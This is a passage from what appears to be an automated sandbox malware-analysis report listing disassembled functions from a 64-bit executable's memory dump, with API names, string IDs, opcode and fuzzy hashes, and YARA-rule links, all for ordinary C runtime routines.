                                                                                                                                                                      • Opcode Fuzzy Hash: 355763e493dad6538389df0793eed467e39f6892aaedefc02179b19105f30a0b
                                                                                                                                                                      • Instruction Fuzzy Hash: 40F03A61F1964282EB45CB52EC903792B64AFF5B40F441439FA2F861E1EE2CD488D741
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10C98C, Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                      • Opcode ID: 718134ce9e332f23656d71c396ac408a803ba87032f76a2a13b0102232623a57
                                                                                                                                                                      • Instruction ID: 8489348a5fb3bc95bbeb81fe74d4643da84def54662c67d75f9cc9d5bbbf25d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 718134ce9e332f23656d71c396ac408a803ba87032f76a2a13b0102232623a57
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AB1C222E0A64281EB65DB179440538AB90FFA4BC4F19A435FB6D877C5FE3CE4618B42
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE1234B4, Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FE1234F6
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6FE123473,?,?,FFFFFFFE,00007FF6FE123EB2), ref: 00007FF6FE1235B4
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6FE123473,?,?,FFFFFFFE,00007FF6FE123EB2), ref: 00007FF6FE12363E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2210144848-0
                                                                                                                                                                      • Opcode ID: a98c3a2d31644f2f566c4bb38b19cf0d62c00298df2419fbc97fda4ba4da40a1
                                                                                                                                                                      • Instruction ID: 3ca93eb259294235adf436d31eadc3db4b373e4c66a99c5a631b3709504d2f52
                                                                                                                                                                      • Opcode Fuzzy Hash: a98c3a2d31644f2f566c4bb38b19cf0d62c00298df2419fbc97fda4ba4da40a1
                                                                                                                                                                      • Instruction Fuzzy Hash: EC81CC62E1865389EB10DB669C406BC2EA4BBF6B84F444172EE2E937D5EE3DA441C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE1023B0, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1087005451-0
                                                                                                                                                                      • Opcode ID: 67962fba6ee768d3bd46e37f5e2b2ec5cc75d89a070fa04924a12c5c9a474b8a
                                                                                                                                                                      • Instruction ID: f92ccb67b5e10fa4cbc2c116225ddd3493fe0eb603ce2512090599835382ee6a
                                                                                                                                                                      • Opcode Fuzzy Hash: 67962fba6ee768d3bd46e37f5e2b2ec5cc75d89a070fa04924a12c5c9a474b8a
                                                                                                                                                                      • Instruction Fuzzy Hash: ED71BF22F15B8189FB10CF66D0403AC2B61EBA47A8F409235EF7D56BD6EE38D1A5C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11C48C, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 09467e227c6f763a2ca8e31c9d578d3e99d2a4337f8899ac365743204cab12c4
                                                                                                                                                                      • Instruction ID: 2f70e46cd915a384b64419db562bc6de2c3cb3d25c4569adbd33ea38b8d664da
                                                                                                                                                                      • Opcode Fuzzy Hash: 09467e227c6f763a2ca8e31c9d578d3e99d2a4337f8899ac365743204cab12c4
                                                                                                                                                                      • Instruction Fuzzy Hash: BD510762E0894645F76ADA7A980037A6A64BFF5390F248235F97ED66D0FF3CE481C601
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE128F40, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                                                                                                                      • Instruction ID: 32c6149d5c1aa823e66e415c176347bf6b50d1c88866d1c194eb8ae3c815e3f7
                                                                                                                                                                      • Opcode Fuzzy Hash: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 84118626E1CA0301F758D16ADC453F51E526FF6371E180634F97E966D6FE2CA9404249
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10DC98, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: eace6af2f1a7ebbb4b7aff053afb1977c84a43959c171a794db1e127813ce6e2
                                                                                                                                                                      • Instruction ID: 2f4f609c00a372bd1068b82cb74b04b4fa0576afc03170dbd190c2f78119e70f
                                                                                                                                                                      • Opcode Fuzzy Hash: eace6af2f1a7ebbb4b7aff053afb1977c84a43959c171a794db1e127813ce6e2
                                                                                                                                                                      • Instruction Fuzzy Hash: 53919173E087858AE710DB66E8402AD7BA0FB98788F10513AFB5D97795EF38D1A5C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10DA80, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: bee794e28527fa9dd78a6d9169989570187a9c92bc85060df153b9b73eff720a
                                                                                                                                                                      • Instruction ID: 4e4b3f714f2d781f5e7d129690a225c560b61c168f19d1bba64e67832f63407a
                                                                                                                                                                      • Opcode Fuzzy Hash: bee794e28527fa9dd78a6d9169989570187a9c92bc85060df153b9b73eff720a
                                                                                                                                                                      • Instruction Fuzzy Hash: 71514A33E08A898AE720CF66D0403AD7BA0FB95B88F145125EF5D53B95EF78E165C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10E20C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      • Opcode ID: 6b6b60d445c1a2224ee2a98b02a42136a49554e3719dd5277a76b90849d165cc
                                                                                                                                                                      • Instruction ID: 603484f4f4e5f008fb470de7bc7a5da07b9111b52109679b887345c08ff6d091
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b6b60d445c1a2224ee2a98b02a42136a49554e3719dd5277a76b90849d165cc
                                                                                                                                                                      • Instruction Fuzzy Hash: 27513E32D082428AEF64CB17994426A6F90BBA5B94F146135FBADC7BD5DF3CE460CB01
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE106CB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                                                                                      • Opcode ID: 9e091129518374d68d5514e3c23e017341073b485b281ddb992ee9e541fd4d25
                                                                                                                                                                      • Instruction ID: 1d2ef2d2a0fa959804dd59e0d29d510bc19ab70a49736f9214696c2a3f7a2e67
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e091129518374d68d5514e3c23e017341073b485b281ddb992ee9e541fd4d25
                                                                                                                                                                      • Instruction Fuzzy Hash: D8414C22F0AA45C9EB14DFA2D4902FC2BB4EFA4748F045435EB5DA7E95EE38D5229304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10E444, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                                                                                      • Opcode ID: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction ID: 5eab508a9a8cbe6934981b331b278dc4e1fb07b434882d1e38ded86ea576f3aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction Fuzzy Hash: 3771A472D0868186DF60CF27A45077A7FA0FB94B95F149136EBAD87AC5EE2CD4A0C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE110C6C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-3916222277
                                                                                                                                                                      • Opcode ID: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction ID: 96043adfaa9a3716d57124d7e3ea264a9a4c113303b65ca4a80a2925e2c16704
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 20619672D0E61686EB64CF6B805417C3FAAFBB5B48F141139EA5A822D4EF3DE491C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11B664, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                      • Opcode ID: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction ID: 66492d5b01d5e2bac4bfc51ebf6ae8e59211ea974eeecb2306ac81866ae542a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction Fuzzy Hash: FE510562F187C586E731CF7698407696F95EBB0B90F08A231E7A887AD6EE2CD040C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10EA74, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                                                                                      • Opcode ID: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction ID: 0348e45b64dd0391eaf790f528247d9cc2f1503d2e1bf08a572815c7fcdcb046
                                                                                                                                                                      • Opcode Fuzzy Hash: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction Fuzzy Hash: 38518F76A0874286D760DB17E54026E7BA4FBD9B90F001134EBAD87B95EF3CE061CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE123258, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction ID: 4c4ccb52f86082f9a1d774550d38cc5455a242aa23f254f138fce6d7178e03a2
                                                                                                                                                                      • Opcode Fuzzy Hash: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction Fuzzy Hash: D041B422F18A4281EB20CF26E8443AA6B60FBA5B84F404131EE5DC7798EF3CD541C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE125E04, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_errorf
                                                                                                                                                                      • String ID: "$powf
                                                                                                                                                                      • API String ID: 2315412904-603753351
                                                                                                                                                                      • Opcode ID: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction ID: 2c75cd3944c2b658185542f23dc50a7afe54b19891e8ea966f9a8b5eb3698d0c
                                                                                                                                                                      • Opcode Fuzzy Hash: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction Fuzzy Hash: D1413D72D28681DBD370CF22E4847A9BAA0F7EA348F101325F759429E8DF79C5509B04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE102D30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: ios_base::failbit set
                                                                                                                                                                      • API String ID: 1109970293-3924258884
                                                                                                                                                                      • Opcode ID: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction ID: d1358c9256e202b851bb49b572bcd29e264a955d65aa0be0cf50762fa0a8ddac
                                                                                                                                                                      • Opcode Fuzzy Hash: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: FA318362E18B8681EB118B25E4403A96760FBE9764F546331FBAC427D5EF6CD1D4C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE125CE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: "$pow
                                                                                                                                                                      • API String ID: 1757819995-713443511
                                                                                                                                                                      • Opcode ID: cd39ec047a0f984d166b0bf4616c01effc3e6dcc66f47e544497a243a356f652
                                                                                                                                                                      • Instruction ID: ee1468e2164faa584f42dde1ed89abc34d78d893075df63b4ba89b6ed7456350
                                                                                                                                                                      • Opcode Fuzzy Hash: cd39ec047a0f984d166b0bf4616c01effc3e6dcc66f47e544497a243a356f652
                                                                                                                                                                      • Instruction Fuzzy Hash: 74316F72D1CAC987E360CF11E44466ABAA1FBEA344F201325F29946994DF7CD0819F00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11CA88, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_errno_from_matherr
